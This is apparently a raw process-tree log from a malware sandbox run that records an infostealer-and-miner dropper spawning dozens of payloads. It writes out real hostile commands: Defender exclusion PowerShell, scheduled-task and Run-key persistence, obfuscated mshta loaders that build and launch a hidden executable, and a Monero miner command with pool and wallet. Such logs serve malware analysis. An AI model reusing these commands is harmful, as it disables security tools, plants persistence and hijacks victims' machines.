- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-1L2K1.tmp\Sun07e840e6fb5.tmp"C:\Users\Admin\AppData\Local\Temp\is-1L2K1.tmp\Sun07e840e6fb5.tmp" /SL5="$20212,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07e840e6fb5.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-KGK0R.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-KGK0R.tmp\postback.exe" ss19⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun075d5a7849d7670a.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun075d5a7849d7670a.exeSun075d5a7849d7670a.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07e5c589dd5d.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07e5c589dd5d.exeSun07e5c589dd5d.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07e5c589dd5d.exe"C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07e5c589dd5d.exe" -u6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07bb82f51727fc79.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07bb82f51727fc79.exeSun07bb82f51727fc79.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\7⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\8⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F7⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\soul3ss_crypted\soul3ss_crypted.exe"C:\Users\Admin\AppData\Local\Temp\soul3ss_crypted\soul3ss_crypted.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 4008⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 4168⤵
- Program crash
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07923b89b57.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun078a90701e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun078a90701e.exeSun078a90701e.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\1748385.exe"C:\Users\Admin\AppData\Roaming\1748385.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\4572242.exe"C:\Users\Admin\AppData\Roaming\4572242.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
-
C:\Users\Admin\AppData\Roaming\3572525.exe"C:\Users\Admin\AppData\Roaming\3572525.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\3386468.exe"C:\Users\Admin\AppData\Roaming\3386468.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\5053532.exe"C:\Users\Admin\AppData\Roaming\5053532.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\6337717.exe"C:\Users\Admin\AppData\Roaming\6337717.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\6337717.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """" == """" for %v In (""C:\Users\Admin\AppData\Roaming\6337717.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )9⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\6337717.exe" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "" == "" for %v In ("C:\Users\Admin\AppData\Roaming\6337717.exe" ) do taskkill -F -IM "%~Nxv"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -IM "6337717.exe"11⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\5052828.exe"C:\Users\Admin\AppData\Roaming\5052828.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 9088⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 8048⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 8448⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 8848⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 9568⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 9088⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 8208⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\xuwei-game.exe"C:\Users\Admin\AppData\Local\Temp\xuwei-game.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4208 -s 15488⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"9⤵
- Loads dropped DLL
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7ffd78aedec0,0x7ffd78aeded0,0x7ffd78aedee010⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"10⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"10⤵
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"9⤵
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"10⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"9⤵
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe10⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"11⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit12⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"13⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"13⤵
-
-
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"12⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4376 -s 15688⤵
- Program crash
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07d7bdaf7c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07d7bdaf7c.exeSun07d7bdaf7c.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07d46efb4bd1.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07d46efb4bd1.exeSun07d46efb4bd1.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07a9799f68e7.exe /mixtwo4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07a9799f68e7.exeSun07a9799f68e7.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07923b89b57.exeSun07923b89b57.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8569206.exe"C:\Users\Admin\AppData\Roaming\8569206.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\177124.exe"C:\Users\Admin\AppData\Roaming\177124.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\4599319.exe"C:\Users\Admin\AppData\Roaming\4599319.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\5128511.exe"C:\Users\Admin\AppData\Roaming\5128511.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Roaming\5481705.exe"C:\Users\Admin\AppData\Roaming\5481705.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\3139137.exe"C:\Users\Admin\AppData\Roaming\3139137.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\1070273.exe"C:\Users\Admin\AppData\Roaming\1070273.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07a9799f68e7.exeSun07a9799f68e7.exe /mixtwo1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun07a9799f68e7.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07a9799f68e7.exe" & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun07a9799f68e7.exe" /f3⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\1070273.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """" == """" for %v In (""C:\Users\Admin\AppData\Roaming\1070273.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )1⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\1070273.exe" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "" == "" for %v In ("C:\Users\Admin\AppData\Roaming\1070273.exe" ) do taskkill -F -IM "%~Nxv"2⤵
-
C:\Users\Admin\AppData\Local\Temp\Qw5u.exeQw5U.Exe -PmowtdFUhhnCoUk3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""-PmowtdFUhhnCoUk "" == """" for %v In (""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )4⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Local\Temp\Qw5u.exe" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "-PmowtdFUhhnCoUk " == "" for %v In ("C:\Users\Admin\AppData\Local\Temp\Qw5u.exe" ) do taskkill -F -IM "%~Nxv"5⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIPt: CloSE( cREateOBJecT ( "WscRipt.SHeLl" ). Run ("CMD /Q /C ECHO | sEt /P = ""MZ"" > IEEeXE.7YX & CoPY /b /Y IEEeXE.7YX + WWgJAR1.EZ + zYEV.3Cu + NUvL.Bf2 B0M3yFV5.lRJ & del wWgJAR1.EZ zYEv.3cU NUVL.Bf2 IEEEXE.7yX& START control.exe .\B0M3YFV5.lRJ " , 0 , tRUE) )4⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C ECHO | sEt /P = "MZ" > IEEeXE.7YX& CoPY /b /Y IEEeXE.7YX + WWgJAR1.EZ + zYEV.3Cu + NUvL.Bf2 B0M3yFV5.lRJ & del wWgJAR1.EZ zYEv.3cU NUVL.Bf2 IEEEXE.7yX& START control.exe .\B0M3YFV5.lRJ5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO "6⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>IEEeXE.7YX"6⤵
-
-
C:\Windows\SysWOW64\control.execontrol.exe .\B0M3YFV5.lRJ6⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\B0M3YFV5.lRJ7⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\B0M3YFV5.lRJ8⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\B0M3YFV5.lRJ9⤵
- Loads dropped DLL
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -IM "1070273.exe"3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7DB39AD1FE3702767D008E3F15B37112 C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CA64654561AF349CEDF55A52A8023573 C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 353381516A6681F3EE0875A1CF8DBA362⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--AelopX6Kw"4⤵
- Checks computer location settings
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exeC:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7ffd79e3dec0,0x7ffd79e3ded0,0x7ffd79e3dee05⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1980,5187898728067172168,3276171133838142216,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7944_1552226335" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2440 /prefetch:15⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1980,5187898728067172168,3276171133838142216,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7944_1552226335" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --mojo-platform-channel-handle=2408 /prefetch:15⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1980,5187898728067172168,3276171133838142216,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7944_1552226335" --mojo-platform-channel-handle=2100 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1980,5187898728067172168,3276171133838142216,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7944_1552226335" --mojo-platform-channel-handle=2072 /prefetch:85⤵
- Modifies system certificate store
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1980,5187898728067172168,3276171133838142216,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7944_1552226335" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1996 /prefetch:25⤵
-
-
